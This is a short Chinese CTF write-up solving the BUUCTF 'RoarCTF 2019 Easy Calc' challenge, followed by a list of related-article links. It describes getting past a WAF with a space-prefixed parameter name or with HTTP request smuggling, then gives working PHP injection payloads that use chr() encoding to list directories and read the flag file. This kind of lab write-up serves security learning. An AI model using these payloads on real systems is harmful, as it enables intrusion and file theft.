BUUCTF:[RoarCTF 2019]Easy Calc
題目地址:https://buuoj.cn/challenges#[RoarCTF%202019]Easy%20Calc
檢視原始碼
抓包發現calc.php
訪問http://node3.buuoj.cn:28908/calc.php
很明顯,程式碼執行繞過,前面原始碼也說了有WAF,這裡繞過WAF有兩種方法
- 在
num
前新增%20
繞過對num的檢測 - HTTP走私之重複Content-Length繞過
首先看下phpinfo()
,禁用了一大堆函式
使用scandir()
函式+chr()
函式繞過程式碼執行
/calc.php?%20num=var_dump(scandir(chr(47)))
或者使用glob()
函式
/calc.php?%20num=var_dump(glob(chr(47).chr(42)))
根目錄發現f1agg
利用file_get_contents()
進行讀取
/calc.php?%20num=file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103))
或者其他花式檔案讀取操作
/calc.php?%20num=show_source(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103))
/calc.php?%20num=print_r(php_strip_whitespace(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))
/calc.php?%20num=readfile(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103))
/calc.php?%20num=var_dump(file(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))
/calc.php?%20num=include(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103))
.......
HTTP走私之Content-Type重複繞過WAF
相關文章
- [RoarCTF 2019]Easy Calc
- [RoarCTF 2019]Easy Calc 1
- 【BUUCTF】easy calc
- [RoarCTF 2019]Easy Java 1Java
- 【BUUCTF】Easy JavaJava
- BUUCTF:[SUCTF 2019]EasySQLSQL
- BUUCTF 4.ciscn_2019_n_1
- calc
- [安洵杯 2019]easy_webWeb
- CSS calc()CSS
- buuctf-pwn刷題-axb_2019_heap
- [安洵杯 2019]easy_web-1Web
- [安洵杯 2019]easy_serialize_phpPHP
- Web_BUUCTF_WriteUp | [強網杯 2019]隨便注Web
- buuctf-web-[極客大挑戰 2019]BuyFlag 1Web
- css calc使用總結CSS
- 【BUUCTF】BabySQliSQL
- 【BUUCTF】AreUSerialz
- 【BUUCTF】HardSQLSQL
- BUUCTF xor
- 關於calc的踩坑
- Pwn buuctf 合集
- BUUCTF reverse 3
- buuctf_misc
- buuctf 逆向 xor
- ●Joyoi Easy
- 【BUUCTF】Youngter-drive
- BUUCTF-Include(Web)Web
- BUUCTF SSTI模板注入
- [BUUCTF 2018]Online Tool
- BUUCTF:Beautiful_SideIDE
- 演算法分析:BUUCTF-2019全國賽的一道逆向題演算法
- CSS中的calc()有什麼作用?CSS
- BUUCTF靶機筆記筆記
- buuctf部分題目wp
- BUUCTF PWN 21-40
- BUUCTF 基礎CODE REVIEWView
- Leetcode(easy heap)LeetCode